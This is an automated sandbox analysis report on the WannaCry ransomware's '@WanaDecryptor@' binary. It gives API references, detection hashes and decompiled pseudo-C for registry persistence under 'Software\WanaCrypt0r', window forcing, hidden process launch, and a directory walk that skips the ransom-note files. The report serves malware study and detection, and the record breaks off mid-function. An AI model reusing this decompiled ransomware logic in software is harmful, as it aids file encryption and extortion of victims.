#535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
#800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
#2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
#2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
#800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
#641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
#2385.MFC42(?,?,?), ref: 00407C0E

Strings

[A, xrefs: 00407BCB
[A, xrefs: 00407BA2
***, xrefs: 00407AFB

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
String ID: ***$[A$[A
API String ID: 3659526348-3419262722
Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67

Uniqueness

Uniqueness Score: -1.00%

Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#2302.MFC42(?,0000040F,?), ref: 004063B2
#2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
#2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
#2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
#2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
#2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
#2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
#2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
#2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
#2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
#2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
#2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
#2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
#2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
#2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2302$#2370
String ID:
API String ID: 1711274145-0
Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665

Uniqueness

Uniqueness Score: -1.00%

Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}

APIs

wcscat.MSVCRT ref: 00401CC1
RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
RegQueryValueExA.KERNELBASE ref: 00401D81
SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
RegCloseKey.KERNELBASE(00000000), ref: 00401DA3

Strings

WanaCrypt0r, xrefs: 00401CAA
Software\, xrefs: 00401C7F

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
String ID: Software\$WanaCrypt0r
API String ID: 3883271862-1723423467
Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6

Uniqueness

Uniqueness Score: -1.00%

Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}

APIs

#567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
#341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
GetSysColor.USER32 ref: 0040861D
GetSysColor.USER32(00000009), ref: 00408624
GetSysColor.USER32(00000012), ref: 0040862B
GetSysColor.USER32(00000002), ref: 00408632
KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
GetSysColor.USER32(0000001B), ref: 0040865C
#6140.MFC42(00000002,000000FF), ref: 00408667

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Color$#341#567#6140CallbackDispatcherUser
String ID:
API String ID: 2603677082-0
Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5);
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15);
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}

0x0040b628
0x0040b62e
0x0040b632
0x0040b638
0x0040b651
0x0040b660
0x0040b663
0x0040b66a
0x0040b671
0x0040b678
0x0040b67e
0x0040b685
0x0040b689
0x0040b689
0x0040b685
0x0040b690

APIs

FindWindowW.USER32(00000000,00000000), ref: 0040B628
ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
SetForegroundWindow.USER32(00000000), ref: 0040B663
SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
BringWindowToTop.USER32(00000000), ref: 0040B678
ExitProcess.KERNEL32 ref: 0040B689

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
String ID:
API String ID: 962039509-0
Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				int _t23;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				_t23 = CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84); // executed
				if(_t23 == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}

0x00401aa0
0x00401aa8
0x00401ab5
0x00401abb
0x00401ac5
0x00401ad2
0x00401ad6
0x00401ade
0x00401ae3
0x00401aeb
0x00401b4c
0x00401aed
0x00401aed
0x00401af3
0x00401b03
0x00401b0c
0x00401b0c
0x00401b12
0x00401b18
0x00401b20
0x00401b20
0x00401b18
0x00401b31
0x00401b38
0x00401b44
0x00401b44

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38

Strings

D, xrefs: 00401AA0

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
String ID: D
API String ID: 786732093-2746444292
Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00401A2B
fread.MSVCRT ref: 00401A4B
fwrite.MSVCRT ref: 00401A58
fclose.MSVCRT ref: 00401A66
fclose.MSVCRT ref: 00401A74

Strings

c.wnry, xrefs: 00401A26

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: fclose$fopenfreadfwrite
String ID: c.wnry
API String ID: 2140422903-3240288721
Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E

Uniqueness

Uniqueness Score: -1.00%

Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}

0x004043e1
0x004043e3
0x004043ea
0x004043ec
0x004043f1
0x004043f6
0x004043f7
0x004043fe
0x00404402
0x00404408

APIs

#4284.MFC42(00000000,00000100,00000001), ref: 004043EC
#3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
#5277.MFC42 ref: 00404402

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #3874#4284#5277
String ID:
API String ID: 1717392697-0
Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5

Uniqueness

Uniqueness Score: -1.00%

Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}

0x004133e6
0x004133e6
0x004133ea
0x004133ee
0x004133f2
0x004133f6
0x004133fb

APIs

#1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6

Strings

62A, xrefs: 004133E6

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #1576
String ID: 62A
API String ID: 1976119259-856450375
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
